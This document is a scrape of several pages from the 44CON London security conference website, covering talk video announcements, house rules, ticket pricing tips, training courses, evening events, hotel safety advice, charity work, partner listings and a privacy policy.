We’ll have more videos from 2018 up soon. Don’t forget to subscribe to our YouTube channel to catch them as they come out!

#####EOF##### More 2018 44CON Videos Added – 44CON

More 2018 44CON Videos Added

This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them.

Matt Lorentzen and Lawrence Munro talk about how to break into a red team (no, not that way, the job way). Lots of juicy info on how to get in there and also a handy toolset for building simulated environments to hone your dark arts.

The inimitable Kev Sheldrake returns with a talk on using the drag and drop kid’s programming language Scratch to build offensive cyber pathogens. Because why not exploit weird machines with the programming equivalent of Lego?

Jay Harris of Digital Interruption talks about shifting left through automation and integration into development processes. Looking at different tools and techniques to automate different aspects of the process, Jay delivers a talk that could only have more automation if he had the talk deliver itself for him.

Leigh-Anne Galloway and Tim Yunusov closed 44CON 2018 with talks about vulnerabilities in Mobile Point of Sales systems, including those used by the 44CON bus bar. We’d buy them a drink, but according to our card bills we already had…

David Rogers gives us some deep insight into HMG’s views of IoT Security and the UK’s Code of Practice for Security in Consumer IoT Products and Services.

We’ll have more 2018 videos up soon. Don’t forget to subscribe to our YouTube channel to catch them as they come out!


About 44CON

What is 44CON?

44CON is an Information Security Conference & Training event taking place in London, designed to provide something for the business and technical Information Security professional.

Why do 44CON?

To bring the best in international Security training + speaking (as well as the best of local talent) to the UK at a reasonable cost.

44CON is located in London, which allows for a wide variety of security professionals to attend from the UK, Europe and further afield.

At the bigger conferences, getting time with top class security speakers is limited. At 44CON, you have great access to speakers, who are all willing to spend time and talk about their work. This is where interesting partnerships can occur.

Don’t just take our word for it, check out what others have said about the conference on our media coverage page.

Who’s behind it?

Sense/Net Ltd is the company that holds the IP for 44CON. Sense/Net is an events management company set up by Adrian and Steve to run conferences and events. Our flagship conference, 44CON, is a public event bringing together the best in UK and International information security research and networking opportunities. If you would like an internal conference for your organisation, or have a requirement for a bespoke event, please contact us to discuss your requirement and how we can help.



44CON House Rules


44CON is welcoming to all. We’ve drafted these house rules to help you understand our guiding behavioural principle: Wheaton’s Law (“Don’t be a dick”). Our house rules aren’t perfect, they’re a work in progress and we’re open to suggestions via houserules@44con.com.

These rules apply to everyone and all interpersonal interactions at the event.

Expectations

What we want you to get from 44CON: Knowledge. New friends. Job Opportunities. Good times.
What we expect from you: Respect for others. Being kind. Not being a dick.

Interpreting Wheaton’s Law

Our crew leads are the arbiters of Wheaton’s Law. Their decision is final. If you’re given an instruction from a crew member, please follow it. If you’re given a warning, please heed it.

Banter, a playful, friendly exchange of teasing remarks, is fine. If it’s not consensual, it’s not banter.

Reporting concerns

  1. If you have a concern, please raise it with the clearly visible crew or at the front desk.
  2. Alternatively, please fill in a feedback form, anonymously if you prefer.
  3. If the above isn’t possible, please email houserules@44con.com with your concern.
  4. Everything is handled in confidence and we can provide space and support where needed.

We welcome anonymous feedback, but it affects our ability to communicate outcomes.

Grounds for removal

We reserve the right to remove anyone from the event without reimbursement for, but not limited to, the following behaviours:

  1. Theft.
  2. Sustained harassment, discrimination or disruption.
  3. Acts of violence.
  4. Criminal activity.
  5. Any other reason where the relevant crew lead believes that your continued presence may cause a risk to the safety of yourself, others or where Wheaton’s Law has been breached to such a degree that you have acted an epic dick.

Please note: Laws at home may not match those here. In particular, free speech isn’t protected, our computer crime laws are ridiculous and both harassment and discrimination are criminal offences.


Hacking 44CON’s Pricing Model (5 Different Ways)


It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?”

Understanding Our Pricing

Traditionally our ticket scheduling has gone Early Bird -> 44CON Standard Ticket. This year, our pricing is a little different. We now have:

  • Early Bird: £299
  • Standard Ticket: £349
  • On the door: £399

You can buy a standard ticket here, but read on for our hacks.

In addition to this we’ve run a free registration Wednesday night event. This year we’ve invited the ManyHats Club to run our Thursday night session, so our free registration ticket gets you in to both evenings instead of one. The free ticket also gets you into our CTF space so you can take part in the CTF. These tickets aren’t out yet, so keep an eye out on the socials and make sure you’re subscribed to our newsletter.

We’ve also redesigned the main hall with more of an expo feel based on a village concept. This means we’re going to offer expo tickets that give you access to the hall. These tickets are only going to be available to certain groups and will be limited.

Hack 1: Exploit Discounts

We run discounts with groups such as the ISSA, OWASP and CREST. Please do use them, that’s what they’re there for. If you book a training course for any of our March, June or September 2019 training you’ll get a discount on tickets equivalent to Early Bird pricing up to but not including tickets bought on the day.

Hack 2: Apply for Assistance

Last year we ran an assistance programme for those who otherwise wouldn’t be able to come. We’ll do the same this year. Assistance tickets include full event entry and accommodation. It’s the cheapest way to get to 44CON. You’ll need to qualify for a ticket, and we haven’t yet launched 2019’s programme. It’ll probably launch in the late spring, so around May/June, but it’s going to come down to this year’s sponsors, such as the awesome wire security.

The criteria for this year’s assistance tickets are yet to be determined but we’re mainly focused on deprived areas of the UK outside London and people from economically disadvantaged backgrounds or situations.

Hack 3: Apply to Join the Crew

The crew work extremely hard to make 44CON what it is, but on the plus side there’s a lot of love amongst the crew. You’ll get to see some of the talks and, of course, you’re crew with all the crewdos that brings (Ouch – Adrian). If that sort of thing floats your boat, crew applications will be up later this year.

Hack 4: Split a ticket

We don’t track your identity while at the event. If your friend has a full ticket, you have an expo ticket and want to swap, then by all means feel free to swap tickets if there’s a particular talk you want to see. We just ask that you don’t abuse it – sharing with a couple of mates is fine. Sharing with heaps of randos, taking the mickey and selling access to talks is a violation of the house rules.

Hack 5: Ask!

If your hackerspace, hacking society or club would like a discount code, email us for one. This is really handy when used with Hack 4.

If there’s something you’d like to run at 44CON inside the event, let us know. We have community spaces for groups like OWASP, the ISSA and CREST amongst others. Some of our sponsors are also looking for help on their stands. Keep an eye out for announcements on our mailing list and pounce when you get the chance.


44CON Training Goes Quarterly

We’ve offered training courses around 44CON for a long time. We provide a mix of high-end focused courses on everything from exploiting Windows Kernel bugs to broader, more generalist courses on web application security and security monitoring. From this year onwards, we’re expanding this to a quarterly schedule.

That’s right, you no longer have to wait a year to sit a high quality training course!

Our 12 month schedule is available here, and you can check out our first courses scheduled for the 11th and 12th of March 2019:

Mastering Container Security – Rory McCune, NCC Group
Malware Reverse Engineering – Joxean Koret

Both courses are two days long and cost £1300 inc. VAT. When you book online remember to keep the 13th of March free for access to an exclusive, invite-only event.

If you’d like to offer a high-end course in London, get in touch.

Advanced Wireless Attacks Against Enterprise Networks (Gabriel Ryan): Workshop Pre-Requisites

Lab Materials for Advanced Wireless Attacks Workshop
For those of you planning on attending the Advanced Wireless Attacks workshop tomorrow, we highly recommend downloading the course materials in advance. The workshop includes a course package that contains the following items:
  • A pre-configured Kali VM loaded with each of the tools you’ll be using during the workshop
  • A step-by-step lab setup guide
  • A detailed course guide to supplement the material covered in the workshop
Most of the hands-on exercises will take place inside of an Active Directory lab running on your laptop. If you plan on following along with the lab material, please try to get the lab up and running before the start of the session by following the steps in the setup guide. The lab setup process is mostly automated, but some of the files may take a while to download.
If you run into any issues setting up your lab environment, please do not hesitate to get in contact with the instructor at training@digitalsilence.com — he will be available today as well as early tomorrow morning to sort out any issues you may encounter.

Making Britain a Better Place For The Most Vulnerable

“You measure the degree of civilization of a society by how it treats its weakest members.”

This quote has been attributed in various forms to historical figures from Pope John Paul to Dostoevsky, Churchill and even Gandhi. It is a commonly held British value that we should treat others how we’d wish to be treated.

The UK’s food poverty crisis has been getting worse for the best part of a decade. From austerity to universal credit, by that quote above our society’s score is dropping like a stone. This year we’ve come together to support the Trussell Trust and Hammersmith & Fulham Foodbank. It’s an initiative we’re calling Hacking For Foodbanks, that will continue beyond 44CON. While it’s been founded by 44CON crew, we want it to be bigger and separate to 44CON. Food poverty is a national problem and we need your help to help those that need it the most. Hacking For Foodbanks has a 4-point plan to make an impact on UK food poverty through cybersecurity and the tech industry, which you can read more about here.

Help us raise money at 44CON

We want you to bring your (working) retro, old and cool tech that you’re willing to part with as part of a bring and buy sale operated by Hammersmith & Fulham Foodbank and the Trussell Trust. We’ll provide tags so you can set a suggested price for your donated goods, and people can come along to the Trussell Trust table and put in an offer. Got a reasonable-sized retro-battlestation like a Rubber keyed spectrum? Fantastic! WPA injection wifi cards and Hayes serial modems? Super! We’re ideally looking for bric a brac others would want to buy at £5-£50 in suggested value.

Anything that doesn’t get sold can be picked up by the people that dropped it off, or alternatively we’ll donate the kit to similar activities at other UK events.

We’re also offering people the opportunity to make a donation to the initiative both at the event and when they buy a ticket, or register for the free open evening.

All funds raised will be split 50/50 between Hammersmith & Fulham Foodbank and the Trussell Trust, in order to support foodbank activity in Fulham and across the UK.

Get involved

We’re also looking for people to take part in our mentoring scheme, to be piloted in early 2019. In particular we want people from non-technical as well as technical fields, particularly where a university degree isn’t required. We want to raise awareness for foodbank users that there are career opportunities out there, from sales and recruiting to technical jobs. We want to bring these opportunities to interested and able foodbank users and help them when they need a hand the most. Most important of all, we want to eliminate UK food poverty, one family at a time. If you’d like to help, wherever you are just drop us an email.

Building A Permanent Community At 44CON

44CON’s always been the kind of place where you turn up, hang out with friends old and new, get your head bent then go home and get on with your life. But we want to do more than that. We’re building a permanent community for everyone, whether you come to 44CON or not. We’re also mostly old(er Steve, damnit! – A) and riddled with nostalgia. Instead of using Snapbook, or Slickchat or whatever the cool kids use, we thought we’d build a traditional Bulletin Board System and drag it kicking and screaming into the modern age.

To say this was a bad idea was an understatement. Our first attempt used a hodge-podge of Docker, a piece of DOS-based software last updated before the average attendee was born and one instance of a DOS emulator per connection. It worked, but was telnet only (thanks to the joys of serial emulation) and was very, very unstable.

In the end we settled on a modern BBS implementation that has a learning curve almost as steep as Radare2, but allows us to do cool modern things, like provide access over SSH and HTTPS. Originally we worked on supporting older platforms like the BBC Micro, C64 and ZX Spectrum, but everything old struggled with newer software, and everything new struggled with older software.

Finally, we have something we think you’re going to love. Registration will open on the 12th of September. May we present the official 44CON rumour mill, Juicy HQ:


For those of you who’ve never used a BBS before, the first thing you need to know is that you apply for an account (register). Once you’ve filled in a form, you’ll be taken to the new scan screen. This is to check for updates since you last logged on. There are public and private message areas, file uploads (check out our collection of classic British hacking textfiles, or our PoC||GTFO archive) and you can play multiplayer old-school BBS games courtesy of our DoorParty setup. If things seem a little less interactive, remember that BBSes were typically built to serve very few, if any concurrent users, and most content was downloaded in batches for later offline use.


Most British people never really got to use dial-in BBSes back in the day due to BT’s monopoly and pricing, although Prestel and Micronet had some popularity. There was one information system that every British person had access to, which was Teletext. On the BBC, we had Ceefax. So we built our BBS around a Ceefax theme, although you might spot the odd reference to Teletext classics such as Bamboozle and even Digitiser. And yes, all of this is accessible in a web browser.


Although Juicy HQ is the official 44CON BBS, it’ll be open to everyone from the 12th of September. Whether you’ve been to 44CON or not, live in the UK or not, or if you’ve never been to a conference before, all are welcome providing Wheaton’s law is followed at all times.

 

 


We’re still refining Juicy HQ in preparation for launch, but we’re making sure there’s plenty of easter eggs for you to find. If you’re interested in beta testing the BBS, give Steve a shout on twitter or mastodon and he’ll hook you up.

What To Expect On Thursday Night

44CON’s a bit different to some other cons in that we tend to run our own Thursday night entertainment instead of a traditional sponsor party. Sponsors and others are welcome to run their own events if they prefer, and indeed, this year some are. Last year was a little quiet, mostly due to Steve not being well enough to plan things.

If you’ve never been to a 44CON, or if last year was your first, you might not expect much, but this year we have a lot going on.


First of all, the biggest of big big shout outs go to our dear friends and Gold sponsors, HackerOne, without whom this night wouldn’t happen. HackerOne are sponsoring the entire evening, so make sure you thank them for helping out. We’ll have complimentary food and drinks from Gin O’Clock onwards courtesy of our Gin O’Clock sponsors Crowdfense, up till 19:00, and at various points and places in the evening from 19:50 onwards courtesy of HackerOne. As well as a selection of alcoholic drinks, we’ll also have a fantastic Mint and Elderflower Fizz mocktail and soft drinks for those who want to keep things light.

The evening session starts at 19:00 with Pwning the 44CON Nerf Gun, by Chris Wade and Dave Lodge of PenTest Partners. This is no ordinary stunt hack talk. The Nerf Terrascout is pretty well put together for a toy tank, and it took the PTP guys a heck of a lot of effort in reversing proprietary RF protocols, manipulating the SPI bus and all kinds of wacky techniques, all to hijack the controller in real-time so they can shoot Steve. This is rather odd, as it’s absolutely not going to happen. The crew won’t let Steve get shot…. honest!

Nicky Bloor will be running a two-hour workshop from 20:00 on Diving Deep into Deserialization, starting with an overview, then diving through exploit and gadget chains into a CTF-style VM for you to play along with (so don’t forget your laptop). Expect this to bend your head a little, but you’ll come out of the other side made of steel.

Looking for something more blue team than red? From 20:00, Philippe Arteau will run a two-hour workshop on Machine Learning with the Orange data visualization, machine learning and data mining toolkit. His workshop, Orange is the new Hack, is essential for anyone conducting triage and will take you through implementing vulnerability classification at scale. The same skillset can be applied to other contexts such as malware classification, system alert classification and vulnerability management.

While the workshops are going on, we’ll have Duckies Den in Track 1 from 20:00. Pitch your ideas to our panel of industry duckies, who’ll award beer tokens accordingly. Our sponsors will also get short pitch slots… but the audience get the beers. This year’s theme for our attendees is “Zany cybersecurity ideas that don’t exist, and probably shouldn’t”. Prizes will be awarded for:

  • Best billed idea
  • Most lame duck pitch
  • Most quackers concept

Could your idea be the nest big thing? Which pitches will fly, and which will sink without a trace? Waddle our panel of duckies take under their wing? Will our sponsors earn a feather in their cap, or will they cry fowl play? It’s not just an eggscuse for duck puns, but we’re sure avian will have a good time!

If it’s all a bit too much and you want to veg out in front of a film, we’ll be screening all-time classic The Big Lebowski in the coffee area from 20:00. Chill out on the sofas, grab some snacks and see what happens when you meet a stranger in the alps. If you don’t like The Big Lebowski, well, that’s just your opinion, man.

Last year we had Linux Kernel poetry and Yoga. This year we’re looking for lightning talks with a twist in our Lightning Talk Poetry Slam from 22:00 in Track 1. Slots are 5-15 minutes long, and should feature, either in part or in whole, some form of poetry. Haikus, Limericks and epic Rap battles are most welcome. Sign up at the front desk, then come up, either take a shot of Sourz or try a British snack and SHOW US WHAT U GOT.

On Hotel Accommodation And Safety

First and foremost, if you’re attending 44CON, please add this phone number to your contacts list, under “44CON”. It’s our at-event emergency crew contact number:

+44 (0)7955 376 729

Recent events in Las Vegas as a result of policy changes following the Mandalay Bay shooting seriously affected some of our attendees visiting the city for conferences in early August. We watched from a distance in abject horror as people routinely had their privacy and safety compromised by aggressive security teams demanding entry to rooms and confiscating soldering irons and lockpicks, some of which we understand haven’t been returned to their owners.

While we completely understand the need to beef up security in the shadow of yet another mass shooting in America, the horrific stories that unfolded on twitter made us ask ourselves what we were doing to ensure that such invasions of safety and privacy don’t happen here.

To that end, we’ve done two things:

  1. We’ve asked the ILEC’s attached hotel under what terms they’ll enter rooms booked there.
  2. We’ve set up an emergency contact number you can call to reach the crew at any time during the event.

In the UK there are reasons under which your hotel room can be forcefully entered, but generally it shouldn’t need to happen unless your stay is longer than a few days and you’ve left the Do Not Disturb tag on your door. This is partly to check that you’re still alive, and also to check you haven’t trashed the hotel room. From the ILEC:

We do not access guests rooms apart from cleaning. If the Do not disturb sign is displayed up to 3 days we do not enter but after that we have to check. Initially we would ring the room and if the guest answers we would ask to go and see the room if it is inacceptable[sic] conditions ( as in damages).

If there is a fire evacuation the fire marshals will go floor by floor and knock and open the rooms for people to evacuate as they can be asleep.

The only other reason for someone to enter the room by force would be if the police or fire service needed to enter in an emergency.

The author of this post is a man, but the 44CON crew are a mix of men and women. If you’re struggling to see why this is primarily a safety rather than privacy issue, I think Joe Fitz summed things up best in this twitter thread:

“I sympathize with @maddiestone and @k8em0 ‘s experiences but realize I can’t possibly know how terrified they probably felt.”

Once again, that emergency crew number is:

+44 (0)7955 376 729

If you’re attending 44CON, please add this number to your contacts. It’ll only be active during the event, but someone will have the phone 24×7. Please don’t abuse this number, as it may block the line for someone who needs it.

Fundamentally, your safety is the most important thing to us. If we can’t get that right, nothing else matters. While we don’t expect problems, should anything happen that could compromise your safety:

  1. If you’re in your room and something is happening outside, make sure the room is locked. Do not let anyone into your room if you don’t want to.
  2. Dial reception on the in-room phone and tell them what’s happening, and what you need them to do.
  3. Let us know something’s happened via email so we can track it, regardless of whether it’s been resolved.
  4. If it’s unresolved, or you feel your safety is being threatened then call +44 (0)7955 376 729. We’ll sort things out from there.
  5. In case you need it, please remember that the emergency services number is 999 in the UK, not 911. 112 will also work.

We don’t expect anyone to need this, but if you do, we’ll do our best to keep you safe.

 

TNMOC Guided Tour Giveaway

Proudly sponsored by F-Secure

Following the recent prize draw for Steelcon tickets, it’s time for the next opportunity to win with 44CON.

F-Secure are sponsoring a guided tour of The National Museum of Computing (TNMOC) which will take place on Saturday 1st September from 12:30.


The tour will last around 2 hours and cover the full museum collection from the Colossus, war code breaking machines and the history of computing from 1940 to the start of the smartphone. Much of what is on display actually works, and the guide will describe how the computers were used, tell anecdotes on their design and operation, and operate some of the equipment.

After the tour you will be able to stay in the museum if you’d like to go back and look at certain computers. TNMOC also has a few old gaming consoles which you’ll be able to play on.

How to enter:

  1. Sign up to our newsletter
  2. Send an email to marizel@44con.com letting us know you’re interested in the TNMOC tour. Please either use the email you used to sign up to the mailing list or mention it in your email.
  3. Keep an eye on your emails in mid August to see if you’re a winner

Winners will be contacted around the 15th of August and the tour will take place on the 1st of September 2018. Instructions/directions will be sent to the winners prior to the tour taking place.

Detailed information about getting to TNMOC situated in Bletchley Park can be found here.

 

Steelcon Ticket winners

44CON Soldering Area at Steelcon

Steelcon is coming up soon, and Steve and Marizel are looking forward to running the soldering area on the 7th of July. We’ll be offering hands-on help for those new to soldering or who haven’t had a chance to solder in a while. So come over, say hi and have a go!

We’ll also have some new sticker designs and a Steelcon exclusive discount code for 44CON tickets!

And the winners are…

After being generously provided with two Steelcon tickets to give away to 44CON supporters, last week we did a random draw. If you bought a 44CON2018 ticket and are signed up for our newsletter you had a chance to win.

We are very happy to announce that Will Deane and Mick Vaites are the winners of the two tickets and were contacted last week.

 

 

 

Introducing 44CON’s House Rules

44CON was born out of a private event that Adrian and I used to occasionally get involved in organising. It was a close-knit group of people featuring deeply opinionated and often spectacularly drunk people who somehow mostly got along.

As 44CON grew, more people outside that group attended. The new people didn’t know about our Overton window. These people paid good money for a good time, but were new to our community and we hadn’t provided guidance on what was acceptable behaviour, or how we handle concerns.

An event with talks about exploiting human and computer trust relationships tends towards some attendees holding unusual views about acceptable behaviour. To make things easier for everyone, we introduced Wheaton’s Law. For those that don’t know, it’s fairly easy to take on board:

“Don’t be a dick.”

For a long time “Don’t be a dick” was the only rule we had. Every year we’d review it, and every year it would stay.

We have had people breach the rule. We’ve had and investigated complaints. We stand by Wheaton’s law as it’s stood by us. What we haven’t done is properly track complaint resolution, and we hadn’t told people how to raise concerns. That’s why we’ve launched our House Rules. They’re not going to be perfect, but it’s a start.

The House Rules are simply an expansion of Wheaton’s Law. They set expectations, a reporting process and circumstances under which we’ll eject someone, along with a reminder that the laws of England and Wales may not match your own at home.

We’ve integrated feedback from event organisers up and down the country, and we’re fully open to suggestions on how to improve them for next year. To be clear, there’s no change in our expectations from previous years, only in how we communicate them.

If you’re coming to 44CON you’ll see the house rules in your brochure or you can read them now. Please take a moment to read them, as they apply to everyone. If you have any questions, suggestions or comments, use the email address on the House rules page before the event, or follow the procedure to report a concern once you’re there.

We want everyone to have a good time, regardless of preferred text editor, open source licensing beliefs or i/o port configuration. We hope you’ll join us and keep making 44CON a great place for everyone.


Win CRESTCon 2019 Tickets!

We’ve teamed up with CREST to give everyone the opportunity to win one of 5 (count ’em) CRESTCon 2019 tickets, worth £175 each. If you’ve never been, now’s your chance. If you’ve been before but don’t have a ticket, now’s your chance too!

CRESTCon is a one-day event organised by CREST, the international certification body for the technical information security market. This year’s CRESTCon is on March 14th at the Royal College of Physicians. If you’re on our 44CON training courses in the same week and/or are coming to 44CONnect, then this is a competition worth taking part in.

To win a CRESTCon ticket, all you need to do is make sure you’re signed up to our mailing list, and email training@44con.com from the address you’ve registered. To shamelessly stack the cards in favour of training attendees and early bird ticket holders, we’ve sliced our 5 ticket allocation the following way:

Some of the talks we’re most looking forward to at this year’s CRESTCon include:

  • Matt Lorentzen – Sheepl – Automating people for Red and Blue Team Tradecraft
  • Thomas V. Fischer – Building a Personal Data Focused Incident Response Plan to Address Breach Notification
  • Martin Jordan – Austerbury: Iranian cyber threat briefing

Winners will be chosen at random over the course of February. Get your entry in quick because like our early bird tickets, once they’re gone, they’re gone!


44CON Privacy Policy

This is a very boring document, but don’t let it put you off.

TL;DR – We consider your privacy rights to be human rights wherever in the world you live. We take steps to secure the information we collect, and only use or share it under specific circumstances. If you ever want to talk to us about it, or request we do something with data held about you, just talk to us and we’ll do our best. If you have any questions, please contact dpo@44con.com.

Sense/Net Ltd (“44CON”) Privacy Policy

We consider privacy rights to be fundamental human rights. Regardless of where you live, you have the right:

  • to access your information and to receive information about its use.
  • to have your information corrected and/or completed.
  • to have your information deleted.
  • to restrict the use of your information.
  • to receive your information in a portable format.
  • to object to the use of your information.
  • to withdraw your consent to the use of your information.
  • to complain to a supervisory authority.

When exercising these rights, there may be consequences affecting our ability to deliver access to the event. We’ll try to warn you of this at the time, but will carry out your request if you confirm you wish to proceed after being warned.

Data Protection Officer: Marizel Fourie

To exercise or query your information rights, please contact our Data Protection Officer at dpo@44con.com.

Data collected

We collect the following pieces of information:

  • We use cookies on websites for analytics, marketing and support.
  • Name, Contact information, IP address, cookie information, device information, geographical information from IP address and time of access through web and host analytics and logs.
  • Email address and any information (for example, food preferences) you provide when buying a ticket or contacting us via email.
  • Country of origin, Email address, name and any information you provide when using our CFP system.

Your information is shared with the following third-parties:

  • Companies sharing directors with Sense/Net Ltd (Currently Alien8 Systems Ltd, Cortex Insight Ltd, Mandalorian Security Services Ltd and Raw Hex Ltd). Sense/Net Ltd doesn’t employ anyone. Instead, people employed by these companies support Sense/Net’s operations. The information is shared in order to support events such as 44CON.
  • Eventbrite (for ticketing), Google (mail, groupware and analytics), Hootsuite (Social media), Mailchimp (44con-announce list), Slack (internal chat), Shopify (Ticket and swag sales), Youtube and Vimeo (Talk and Workshop videos), Sched (Scheduling – speaker details), SagePay (for payment processing).
  • We also use other platforms such as Sched for scheduling, YouTube and Vimeo for video but your information is not provided by us, unless you’re the subject of the content (e.g. a speaker).
  • Volunteers working on events (e.g. our CFP panel and where relevant, ops leads). This is provided on a need-to-know basis and strictly for the purposes of making events run smoothly. Data is shared with volunteers on an individual, not company basis.

Your information is not shared by us:

  • With sponsors, friends of 44CON or partners except as shown above or where specific explicit consent is granted (e.g. you asked a crew member to pass your email address to a sponsor).

On consent

When you send us information, you are deemed to have given us the consent to process it in accordance with our policy and the laws of England and Wales.

You may withdraw consent by emailing our DPO in the first instance, or using function-specific features such as the unsubscribe button in every 44CON-announce list email, or their equivalents.

Use of collected data

How we use your information:

  • Administrative and business purposes, including but not limited to processing orders and refunds, travel bookings, contacting you with information about the event or those connected to it.
  • In order to meet contractual obligations.
  • Improving our systems and marketing through the use of analytics.
  • Advertising goods and services.
  • To fulfil legal obligations under the laws of England and Wales.

How long we retain it for (in order of importance from most to least):

  • As long as we need it in order to comply with the laws of England and Wales (e.g. for tax purposes).
  • As long as we need it in order to perform the functions above.
  • As long as consent is not withdrawn (e.g. our announce list).

How we secure your information:

  • We use Google’s G Suite to store the majority of our data used for operating the event, which allows us (amongst other things) to track who downloaded copies of it.
  • We use appropriate encryption methods (TLS, PGP, drive crypto) to protect personal data at endpoints and in transit.
  • We try to avoid collecting information where practical.

Transfers of information outside of the EU:

As an international event, some of our volunteers are based in and outside of the EU. Where we transfer information outside the EU, we’ll ensure appropriate safeguards are in place, for example our non-EU suppliers such as Google have self-certified as compliant with the EU-US privacy shield.

Sensitive Personal Information

We do not knowingly or intentionally collect what is commonly referred to as “sensitive personal information”. Please do not submit sensitive personal information about you to us.

#####EOF##### tickets – 44CON

Hacking 44CON’s Pricing Model (5 Different Ways)

It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?” Continue reading “Hacking 44CON’s Pricing Model (5 Different Ways)”

44CON 2019 Early-Bird Tickets are now on sale

Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

#####EOF##### Partners of 44CON – 44CON

Partners of 44CON

 

Conference Partners

DeepSec

https://deepsec.net

Bringing together the world’s most renowned security professionals from academics, government, industry, and the underground hacking community.

SteelCon

https://www.steelcon.info/

SteelCon is an event held in the North of England for anyone who is interested in how things work, how things can be broken and how they can be fixed. It’s for people who like to tinker with things, aren’t happy with something until they know how it does what it does and won’t let something be broken without trying to fix it. SteelCon 2018 took place on 3rd-8th of July and 44CON ran the soldering area, we hope you saw us there!

Hack in the Box

http://conference.hitb.org/

HITBSecConf or the Hack In The Box Security Conference is an annual must attend event in the calendars of security researchers and professionals around the world. Held annually in Kuala Lumpur, Malaysia and Amsterdam in The Netherlands, HITBSecConf is a platform for the discussion and dissemination of next generation computer security issues. Our events routinely feature two days of trainings and a two-day multi-track conference featuring cutting-edge hardcore technical talks delivered by some of the most respected names in the computer security industry. HITBSecConf is a place where ideas are exchanged, talent discovered and genius celebrated.

Suits & Spooks

http://www.suitsandspooks.com

Suits and Spooks London 2015 was held at the techUK facility in London. Following a fantastic event in 2014, Suits and Spooks London 2015 was our first 2-day international event. Speakers included Marina Litvinenko, the widow of the Russian FSB officer who was poisoned in London with radiation, EJ Hilbert of Kroll Associates, Zach Tumin of the NYPD, and many more. We’ll also have representatives from the British government speaking and in attendance, along with British Venture Capitalists and the usual mix of public and private sector participants.

Media Partners

O’Reilly

http://www.oreilly.com/

O’Reilly provides technology and business training, knowledge, and insight to help companies succeed in the face of huge economic and technological shifts confronting businesses today. Our unique network of security experts and innovators share their knowledge and expertise on the company’s comprehensive training and information platform and at the O’Reilly Security conference in New York.

Community Partners

BSides London

http://www.securitybsides.org.uk

B-Sides London, Security B-Sides is a community-driven event built for and by information security community members.

BSides London 2018 took place on 6 June 2018 at the ILEC conference centre.

CREST

CREST is the not-for-profit accreditation and certification body representing the technical information security industry. CREST provides internationally recognised accreditation for organisations and individuals providing penetration testing, cyber incident response and threat intelligence services.

All CREST Member Companies undergo regular and stringent assessment; while CREST qualified individuals have to pass rigorous examinations to demonstrate knowledge, skill and competence. CREST is governed by an elected executive board of experienced security professionals who also promote, develop and support awareness, ethics and standards within the cyber security marketplace.

Follow us on Twitter: @crestadvocate

44CON will be a community sponsor of CRESTCon 2019 that will take place on 14th March 2019 at the Royal College of Physicians in London.

 IISP

The Institute of Information Security Professionals (IISP) is a not-for-profit organisation, owned by its members and dedicated to raising the standard of professionalism in information security and the industry as a whole. The IISP does this through accrediting skills and competence, by sharing best practice and by providing a network of support and guidance on individual skill development. It speaks with an authoritative voice and its competency based memberships are widely recognised in the information security industry.

Working closely with the Information Security community, the IISP has a growing membership of over 2,600 individual members across private and government sectors, forty two Corporate Member Organisations and seventeen Academic Partners.

At the heart of the Institute is the IISP Skills Framework©2012, which is widely accepted as the de facto standard for measuring competency of Information Security Professionals. CESG have taken this framework to underpin a range of certification schemes, including the Certified Professional Scheme (CCP), for which the IISP is the leading certifying body, and to develop syllabuses for Masters Degrees. The skills framework is used extensively by our corporate members to benchmark and develop capability of their employees; it has also been adopted by e-Skills UK to develop a National Occupational Standard for Information Security. The IISP also accredits training courses offered by commercial training providers against the Institute’s Skills Framework. This enables attendees to build knowledge in areas of the skills framework where they might have gaps and to gain hands-on experience.

More information about the IISP and its work can be found at www.iisp.org.

ISSA-UK

Welcome to ISSA-UK, the UK Chapter of the ISSA. With active participation from individuals and chapters all over the world, the Information Systems Security Association (ISSA) is the largest international, not-for-profit association specifically for information security professionals. Having welcomed over 1,800 members since our beginnings in 2003, the ISSA-UK Chapter is the world’s most successful chapter. At only $95 per year for membership, we offer the most value out of any security association globally.

RawHex

We break things so you don’t have to. We build things so you can do, too. Home of the HIDIOT, the little computer you can build yourself.

OWASP

The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions.

 

#####EOF##### Win CRESTCon 2019 Tickets! – 44CON

Win CRESTCon 2019 Tickets!

We’ve teamed up with CREST to give everyone the opportunity to win one of 5 (count ’em) CRESTCon 2019 tickets, worth £175 each. If you’ve never been, now’s your chance. If you’ve been before but don’t have a ticket, now’s your chance too!

CRESTCon is a one-day event organised by CREST, the international certification body for the technical information security market. This year’s CRESTCon is on March 14th at the Royal College of Physicians. If you’re on our 44CON training courses in the same week and/or are coming to 44CONnect, then this is a competition worth taking part in.

To win a CRESTCon ticket, all you need to do is make sure you’re signed up to our mailing list, and email training@44con.com from the address you’ve registered. To shamelessly stack the cards in favour of training attendees and early bird ticket holders, we’ve sliced our 5 ticket allocation the following way:

Some of the talks we’re most looking forward to at this year’s CRESTCon include:

